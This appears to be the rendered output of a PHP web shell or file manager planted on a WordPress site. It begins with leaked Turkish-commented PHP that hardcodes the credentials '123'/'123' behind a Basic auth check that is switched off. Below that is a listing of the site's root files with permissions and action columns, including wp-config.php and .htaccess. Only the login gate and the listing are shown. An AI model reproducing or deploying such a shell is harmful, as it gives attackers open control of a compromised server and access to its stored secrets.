# Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>
Name | Size | Modified | Perms | Actions | |
---|---|---|---|---|---|
wp-admin | --- | September 11 2023 08:30:21. | 0755 | ||
wp-content | --- | August 06 2024 13:25:43. | 0755 | ||
wp-includes | --- | December 25 2023 01:56:33. | 0755 | ||
.htaccess | 1.62 KB | October 12 2024 00:01:11. | 0644 | ||
.htaccess.bk | 231 bytes | July 16 2023 00:30:46. | 0644 | ||
default.php | 10.49 KB | November 11 2024 13:50:56. | 0644 | ||
error_log | 6.10 KB | January 15 2024 18:02:01. | 0644 | ||
error_log-20230914-1694662747.gz | 10.54 KB | September 13 2023 15:58:43. | 0644 | ||
google9f82fa71bffffca5.html | 53 bytes | September 15 2023 16:15:36. | 0644 | ||
index.php | 405 bytes | January 15 2024 18:01:21. | 0644 | ||
license.txt | 19.45 KB | January 15 2024 18:01:21. | 0644 | ||
monarx-analyzer.php | 2.38 KB | May 21 2024 21:18:07. | 0644 | ||
readme.html | 7.23 KB | January 30 2024 23:21:28. | 0644 | ||
robots.txt | 75 bytes | July 06 2023 09:14:26. | 0644 | ||
wp-activate.php | 7.04 KB | January 15 2024 18:01:21. | 0644 | ||
wp-blog-header.php | 351 bytes | January 15 2024 18:01:21. | 0644 | ||
wp-comments-post.php | 2.27 KB | January 15 2024 18:01:21. | 0644 | ||
wp-config-sample.php | 2.94 KB | January 15 2024 18:01:21. | 0644 | ||
wp-config.php | 3.35 KB | September 05 2023 20:17:50. | 0644 | ||
wp-cron.php | 5.51 KB | January 15 2024 18:01:21. | 0644 | ||
wp-links-opml.php | 2.44 KB | January 15 2024 18:01:22. | 0644 | ||
wp-load.php | 3.83 KB | January 15 2024 18:01:21. | 0644 | ||
wp-login.php | 49.73 KB | January 30 2024 23:21:28. | 0644 | ||
wp-mail.php | 8.33 KB | January 15 2024 18:01:22. | 0644 | ||
wp-settings.php | 25.79 KB | January 15 2024 18:01:22. | 0644 | ||
wp-signup.php | 33.58 KB | January 15 2024 18:01:21. | 0644 | ||
wp-trackback.php | 4.77 KB | January 15 2024 18:01:22. | 0644 | ||
xmlrpc.php | 3.08 KB | January 15 2024 18:01:21. | 0644 |